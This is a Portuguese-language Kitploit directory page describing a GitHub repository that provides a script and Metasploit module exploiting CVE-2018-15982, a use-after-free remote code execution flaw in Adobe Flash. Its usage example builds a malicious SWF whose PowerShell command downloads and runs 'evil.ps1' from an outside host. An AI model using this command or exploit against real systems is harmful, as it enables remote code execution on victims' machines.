Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/kphongagsorn/adobe-flash-cve2018-15982
Exploit FrameworksPayload GenerationVulnerability AnalysisExploitationWeb Application Exploitation
GitHubkphongagsorn/adobe-flash-cve2018-15982

adobe-flash-cve2018-15982

Script and metasploit module for CVE-2018-15982

Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
115há 6 anosAinda não revisado

Adobe Flash CVE-2018-15982

Este script cria um payload swf para o CVE-2018-15982, que é baseado no PoC do https://github.com/smgorelik/Windows-RCE-exploits. A vulnerabilidade foi descoberta por Chenming Xu e Ed Miles da Gigamon ATR.

A vulnerabilidade é uma falha de use-after-free que permite a execução arbitrária de código no Flash. Mais informações podem ser encontradas nos links abaixo.

  • https://threatpost.com/adobe-patches-zero-day-vulnerability-in-flash-player/139629/
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-15982

Nota: Atualmente está sendo pulverizado apenas um bloco, percebi isso depois de criar o script.

Uso:

python create_swf.py <command> <output file name>

Exemplo de uso:

python create_swf.py "powershell.exe IEX (iwr 'http://192.168.56.101/evil.ps1')" downloadtest.swf

Testado em:

  • Windows 10 Enterprise 10.0.17134, Internet Explorer 11.285.17134.0
  • Adobe Flash 31.0.0.153, 29.0.0.140

Exemplo

Criar payload:

alt text

Executando payload:

alt text

Confirmar execução:

alt text

Módulo Metasploit

alt text

Baixar ferramenta